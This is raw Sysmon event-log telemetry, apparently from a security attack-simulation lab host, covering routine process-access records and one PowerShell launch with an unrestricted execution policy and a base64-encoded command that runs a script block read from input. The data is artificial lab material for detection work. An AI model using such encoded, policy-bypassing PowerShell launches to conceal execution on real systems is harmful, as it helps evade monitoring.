10:40:53.452{733EE690-3E35-5F80-8000-000000007F01}50765096C:\Windows\system32\conhost.exe{733EE690-3E35-5F80-8400-000000007F01}2660C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002780Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.452{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002779Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.452{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002778Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.452{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002777Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.452{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002776Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.452{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002775Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.452{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002774Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.452{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002773Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.452{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E35-5F80-8400-000000007F01}2660C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002772Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.452{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002771Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.452{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002770Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.452{733EE690-3E35-5F80-8300-000000007F01}42842744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3E35-5F80-8400-000000007F01}2660C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+5404e05b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534eeee5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534eebb6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+53fa021b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534af74c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+5350dc1b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534f1280|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534f1280|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534f1111|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534e3096|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534ef5c9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534ef1bc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534eeee5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534eebb6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+53fa021b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534d5a17|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+534d4fe7 154100x80000000000000002769Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.458{733EE690-3E35-5F80-8400-000000007F01}2660C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3E35-5F80-A1DB-040000000000}0x4dba10HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{733EE690-3E35-5F80-8300-000000007F01}4284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000002768Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.437{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002767Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.437{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002766Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.437{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002765Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.390{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E35-5F80-8300-000000007F01}4284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002764Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.390{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E35-5F80-8300-000000007F01}4284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002763Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.359{733EE690-3E35-5F80-8300-000000007F01}4284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_osj0gvs2.m12.ps12020-10-09 10:40:53.359 10341000x80000000000000002762Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.343{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E35-5F80-8300-000000007F01}4284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002761Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.328{733EE690-3E35-5F80-8000-000000007F01}50765096C:\Windows\system32\conhost.exe{733EE690-3E35-5F80-8300-000000007F01}4284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002760Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.312{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002759Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.312{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002758Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 